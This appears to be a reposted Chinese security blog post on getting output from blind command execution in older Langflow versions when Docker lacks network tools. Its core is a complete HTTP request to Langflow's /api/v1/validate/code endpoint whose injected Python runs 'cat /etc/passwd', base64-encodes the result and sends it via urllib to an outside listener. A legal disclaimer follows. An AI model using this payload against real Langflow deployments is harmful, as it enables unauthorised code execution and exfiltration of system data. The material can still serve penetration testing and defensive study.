文章总结： 文章介绍了在Langflow无回显命令执行场景下的一种绕过思路。针对Docker环境缺乏常用网络工具、无法写文件及反弹Shell受限的情况，作者利用Python内置urllib.request模块结合subprocess，通过HTTP请求将命令执行结果外带至攻击者服务器，成功在受限环境中实现了数据获取。 综合评分： 76 文章分类： 渗透测试,漏洞POC,实战经验,应用安全

langflow 命令执行 无回显小思路

原创

e0mlja e0mlja

e0m安全屋

2026年3月24日 11:23 四川

水个文章玩儿。

看到有个朋友写了langflow老版本的命令执行，不考虑内存马的情况下，做命令执行的回显。

一般的思路是带外，写文件到可访问目录下。这里的情况有点特殊

（1）docker环境里面 curl wget dis nslookup ping等命令不可用。bash原生的命令很少

（2）python打包运行之前文件已经处理好了 ，没办法直接写静态目录下访问（访问会304）,

（3）直接反弹shell 进程卡死了，真实环境肯定不可用。

考虑到会外接api 所以机器一般都会出网，这里采用python的http服务，打一个http的外带执行命令。

代码如下

POST /api/v1/validate/code HTTP/1.1Content-Type: application/jsonHost: 127.0.0.1:7860{  "code": "def foo(p=__import__('urllib.request', fromlist=['urlopen']).urlopen('http://host.docker.internal:9076/log?data=' + __import__('base64').b64encode(__import__('subprocess').check_output('cat /etc/passwd', shell=True).strip()).decode())): pass"}

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：e0m安全屋 e0mlja e0mlja《langflow 命令执行 无回显小思路》